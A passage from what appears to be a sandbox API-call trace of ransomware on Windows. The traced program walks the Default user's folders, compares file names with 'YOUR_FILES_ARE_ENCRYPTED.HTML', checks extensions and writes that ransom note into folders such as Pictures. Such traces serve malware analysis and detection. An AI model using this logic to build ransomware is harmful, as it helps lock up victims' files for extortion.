Documents") returned="\\\\?\\C:\\Users\\Default\\My Documents" [0171.357] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\My Documents", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\My Documents\\*") returned="\\\\?\\C:\\Users\\Default\\My Documents\\*" [0171.357] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\My Documents\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4edc64e, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="ꀈݎ")) returned 
0xffffffff [0171.357] GetProcessHeap () returned 0x270000 [0171.357] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.358] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x175ece7c, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x175ece7c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x175ece7c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="NetHood", cAlternateFileName="")) returned 1 [0171.358] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\NetHood") returned 28 [0171.358] GetProcessHeap () returned 0x270000 [0171.358] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.358] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\NetHood" | out: lpString1="\\\\?\\C:\\Users\\Default\\NetHood") returned="\\\\?\\C:\\Users\\Default\\NetHood" [0171.358] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\NetHood", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\NetHood\\*") returned="\\\\?\\C:\\Users\\Default\\NetHood\\*" [0171.358] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\NetHood\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4edc64e, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="ꀈݎ")) returned 0xffffffff [0171.358] GetProcessHeap () returned 0x270000 [0171.359] HeapFree (in: 
hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.359] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x4ef6cd7a, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0xbcc7bbc0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xbcc7bbc0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0xc0000, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0171.359] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT") returned 31 [0171.359] lstrcmpW (lpString1="NTUSER.DAT", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.359] PathFindExtensionW (pszPath="NTUSER.DAT") returned=".DAT" [0171.359] lstrlenW (lpString=".DAT") returned 4 [0171.359] PathFindExtensionW (pszPath="NTUSER.DAT") returned=".DAT" [0171.359] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x201486e4, ftCreationTime.dwHighDateTime=0x1ca0453, ftLastAccessTime.dwLowDateTime=0x48a232fe, ftLastAccessTime.dwHighDateTime=0x1cbf8b9, ftLastWriteTime.dwLowDateTime=0x48a232fe, ftLastWriteTime.dwHighDateTime=0x1cbf8b9, nFileSizeHigh=0x0, nFileSizeLow=0x400, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="NTUSER.DAT.LOG", cAlternateFileName="NTUSER~3.LOG")) returned 1 [0171.359] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG") returned 35 [0171.360] lstrcmpW (lpString1="NTUSER.DAT.LOG", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.360] PathFindExtensionW (pszPath="NTUSER.DAT.LOG") returned=".LOG" [0171.360] lstrlenW (lpString=".LOG") returned 4 [0171.360] PathFindExtensionW 
(pszPath="NTUSER.DAT.LOG") returned=".LOG" [0171.360] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x4ef6cd7a, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x4ef6cd7a, ftLastAccessTime.dwHighDateTime=0x1ca0427, ftLastWriteTime.dwLowDateTime=0xbcc7bbc0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x30400, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="NTUSER.DAT.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0171.360] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1") returned 36 [0171.360] lstrcmpW (lpString1="NTUSER.DAT.LOG1", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.360] PathFindExtensionW (pszPath="NTUSER.DAT.LOG1") returned=".LOG1" [0171.360] lstrlenW (lpString=".LOG1") returned 5 [0171.360] PathFindExtensionW (pszPath="NTUSER.DAT.LOG1") returned=".LOG1" [0171.360] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x4ef6cd7a, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x4ef6cd7a, ftLastAccessTime.dwHighDateTime=0x1ca0427, ftLastWriteTime.dwLowDateTime=0x4ef6cd7a, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="NTUSER.DAT.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0171.360] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2") returned 36 [0171.360] lstrcmpW (lpString1="NTUSER.DAT.LOG2", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.360] PathFindExtensionW (pszPath="NTUSER.DAT.LOG2") returned=".LOG2" [0171.360] lstrlenW (lpString=".LOG2") returned 5 [0171.360] PathFindExtensionW 
(pszPath="NTUSER.DAT.LOG2") returned=".LOG2" [0171.360] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5bbcea65, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0x5bbcea65, ftLastAccessTime.dwHighDateTime=0x1ca043c, ftLastWriteTime.dwLowDateTime=0x5bfd2f8c, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0171.360] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf") returned 76 [0171.360] lstrcmpW (lpString1="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.361] PathFindExtensionW (pszPath="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf") returned=".blf" [0171.361] lstrlenW (lpString=".blf") returned 4 [0171.361] PathFindExtensionW (pszPath="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf") returned=".blf" [0171.361] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5bc8d146, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0x5bc8d146, ftLastAccessTime.dwHighDateTime=0x1ca043c, ftLastWriteTime.dwLowDateTime=0x5bface2c, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0171.361] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms") returned 113 [0171.361] lstrcmpW (lpString1="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.361] PathFindExtensionW (pszPath="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms") returned=".regtrans-ms" [0171.361] lstrlenW (lpString=".regtrans-ms") returned 12 [0171.361] PathFindExtensionW (pszPath="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms") returned=".regtrans-ms" [0171.361] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5bd71988, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0x5bd71988, ftLastAccessTime.dwHighDateTime=0x1ca043c, ftLastWriteTime.dwLowDateTime=0x5bfd2f8c, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0171.361] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms") returned 113 [0171.361] lstrcmpW (lpString1="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.361] PathFindExtensionW (pszPath="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms") returned=".regtrans-ms" [0171.361] lstrlenW (lpString=".regtrans-ms") returned 12 [0171.361] PathFindExtensionW 
(pszPath="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms") returned=".regtrans-ms" [0171.361] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc8e9ac0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7b50453a, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0171.361] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\ntuser.ini") returned 31 [0171.361] lstrcmpW (lpString1="ntuser.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.361] PathFindExtensionW (pszPath="ntuser.ini") returned=".ini" [0171.361] lstrlenW (lpString=".ini") returned 4 [0171.362] PathFindExtensionW (pszPath="ntuser.ini") returned=".ini" [0171.362] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa145187, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Pictures", cAlternateFileName="")) returned 1 [0171.362] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Pictures") returned 29 [0171.362] GetProcessHeap () returned 0x270000 [0171.362] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.362] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\Pictures" | out: 
lpString1="\\\\?\\C:\\Users\\Default\\Pictures") returned="\\\\?\\C:\\Users\\Default\\Pictures" [0171.362] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Pictures", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Pictures\\*") returned="\\\\?\\C:\\Users\\Default\\Pictures\\*" [0171.362] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Pictures\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa145187, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.383] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa145187, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.383] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.383] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\Default\\Pictures\\desktop.ini") returned 41 [0171.383] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.383] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.383] lstrlenW (lpString=".ini") returned 4 [0171.383] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.383] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0171.384] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.384] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 59 [0171.384] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\pictures\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.385] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.387] CloseHandle (hObject=0x5a0) returned 1 [0171.387] GetProcessHeap () returned 0x270000 [0171.389] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.389] FindNextFileW (in: hFindFile=0x42f3100, 
lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x175ece7c, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x175ece7c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x175ece7c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0171.389] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\PrintHood") returned 30 [0171.389] GetProcessHeap () returned 0x270000 [0171.389] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.389] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\PrintHood" | out: lpString1="\\\\?\\C:\\Users\\Default\\PrintHood") returned="\\\\?\\C:\\Users\\Default\\PrintHood" [0171.389] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\PrintHood", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\PrintHood\\*") returned="\\\\?\\C:\\Users\\Default\\PrintHood\\*" [0171.389] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\PrintHood\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="ꀈݎ")) returned 0xffffffff [0171.389] GetProcessHeap () returned 0x270000 [0171.390] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.390] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: 
lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x175ece7c, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x175ece7c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x175ece7c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Recent", cAlternateFileName="")) returned 1 [0171.390] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Recent") returned 27 [0171.390] GetProcessHeap () returned 0x270000 [0171.390] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.390] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\Recent" | out: lpString1="\\\\?\\C:\\Users\\Default\\Recent") returned="\\\\?\\C:\\Users\\Default\\Recent" [0171.390] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Recent", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Recent\\*") returned="\\\\?\\C:\\Users\\Default\\Recent\\*" [0171.390] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Recent\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="ꀈݎ")) returned 0xffffffff [0171.391] GetProcessHeap () returned 0x270000 [0171.391] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.391] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa145187, 
ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4f74bcf, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0171.391] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Saved Games") returned 32 [0171.391] GetProcessHeap () returned 0x270000 [0171.391] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.391] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\Saved Games" | out: lpString1="\\\\?\\C:\\Users\\Default\\Saved Games") returned="\\\\?\\C:\\Users\\Default\\Saved Games" [0171.391] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Saved Games", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Saved Games\\*") returned="\\\\?\\C:\\Users\\Default\\Saved Games\\*" [0171.391] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa145187, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4f74bcf, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.392] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa145187, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4f74bcf, 
ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.392] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4f74bcf, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.392] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Saved Games\\desktop.ini") returned 44 [0171.392] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.392] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.392] lstrlenW (lpString=".ini") returned 4 [0171.392] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.392] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4f74bcf, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0171.392] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.392] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Saved Games\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 62 [0171.393] CreateFileW 
